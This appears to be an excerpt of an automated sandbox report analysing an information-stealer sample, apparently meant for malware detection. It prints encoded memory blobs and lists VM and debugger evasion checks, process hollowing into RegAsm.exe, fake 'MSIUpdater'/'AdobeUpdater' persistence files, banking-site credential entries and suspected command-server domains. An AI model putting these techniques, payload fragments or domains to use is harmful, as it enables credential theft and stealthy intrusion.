LTSa1mvlaKprJUJIpnWr30WVhfG1wRno7Ou3cF2tpP3xF2pkOU5vy86XhhyxlqE9HTLQYUMojgV8q9ODzUXLbxWzK/ZKI3rkrIGFkZmRdr0WffmX91WbitQH63DCEnQ3rutG1DBIXV73QYXkiqmMW8Vu+F6IYaFLPFibpYCvWdqa5euzm4wASrFl7hx59wixe916VrWor7/LR1RwbfRM3ZDHiA9d+r6uLhAvkHE/7GY8XhfjaF3eiso7gDvw56tlyKHcJ9locNvwwauttSLO9tH2h4ABpfxVeWp5cNhRjml3ecGiVDs4vikm7dU4OOrv4FdDu3621TEC0ZAvx3cJzKlwVHqcJLgEQoOC9dwoKN8VJSL1Uo6cd8X/oURNbmKMNyh3jqv8o3J29EtLi4ZBGlmf8ljmlqYy97XCx4/+XmHd8a7VK/ZK+ox1GWo1ve2zhapCJZntBNUx2+Ab5E8v7CAFVcOpXvV+AAAxe3TeLs943LDxb4iTGvD6fIRB4J6ZR6jI+EPw959sgDkaVvANG7Nr72KQ8LuBIgyQfqf+m+iHiUj4SLub8eUbGXr45sj5eH6SVxU0CxrdR34NEWUjCII5KmpCckr5zRxXbaffxgnZdm2vKKO081W1smR0p8/nOBzQ8DI3feQCIChRSRIOORV9wT6RphUcA0b4nNYsG/2swVxRBK8YOLh3g0mmEmUKjzBNi369LJUIgTx1nP/O
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.15.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.15.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2148941162.0000000006135000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2148994056.000000000613C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                  Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.15.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM
                  Source: Amcache.hve.15.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: Amcache.hve.15.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: outlook.office.comVMware20,11696487552s
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: ZvP9NIG0u2hrWeb Data.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: RegAsm.exe, 00000015.00000002.2456254141.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00A6400F rdtsc 0_2_00A6400F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00436340 LdrInitializeThunk,12_2_00436340
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004E8CD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_004E8CD3
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004EC11D mov ecx, dword ptr fs:[00000030h]7_2_004EC11D
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004F53CE mov eax, dword ptr fs:[00000030h]7_2_004F53CE
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: 9_2_00BFC11D mov ecx, dword ptr fs:[00000030h]9_2_00BFC11D
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: 9_2_00C053CE mov eax, dword ptr fs:[00000030h]9_2_00C053CE
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 17_2_00E9C11D mov ecx, dword ptr fs:[00000030h]17_2_00E9C11D
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 17_2_00EA53CE mov eax, dword ptr fs:[00000030h]17_2_00EA53CE
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 20_2_00E9C11D mov ecx, dword ptr fs:[00000030h]20_2_00E9C11D
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 20_2_00EA53CE mov eax, dword ptr fs:[00000030h]20_2_00EA53CE
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004F79CD GetProcessHeap,7_2_004F79CD
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004E8CD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_004E8CD3
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004E4D66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_004E4D66
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004E4EC2 SetUnhandledExceptionFilter,7_2_004E4EC2
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004E4FF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_004E4FF9
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: 9_2_00BF8CD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00BF8CD3
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: 9_2_00BF4D66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00BF4D66
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: 9_2_00BF4EC2 SetUnhandledExceptionFilter,9_2_00BF4EC2
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: 9_2_00BF4FF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00BF4FF9
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 17_2_00E98CD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00E98CD3
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 17_2_00E94D66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00E94D66
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 17_2_00E94EC2 SetUnhandledExceptionFilter,17_2_00E94EC2
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 17_2_00E94FF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00E94FF9
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 20_2_00E98CD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00E98CD3
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 20_2_00E94D66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00E94D66
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 20_2_00E94EC2 SetUnhandledExceptionFilter,20_2_00E94EC2
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 20_2_00E94FF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00E94FF9

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_00C4018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,7_2_00C4018D
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: roomabolishsnifftwk.shop
                  Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: civilianurinedtsraov.shop
                  Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: stalfbaclcalorieeis.shop
                  Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: employhabragaomlsp.shop
                  Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: femininiespywageg.shop
                  Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: averageaattractiionsl.shop
                  Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: buttockdecarderwiso.shop
                  Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: museumtespaceorsp.shop
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 6DE008Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E76008Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C48008Jump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11B6008
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9CC008
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess created: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe "C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
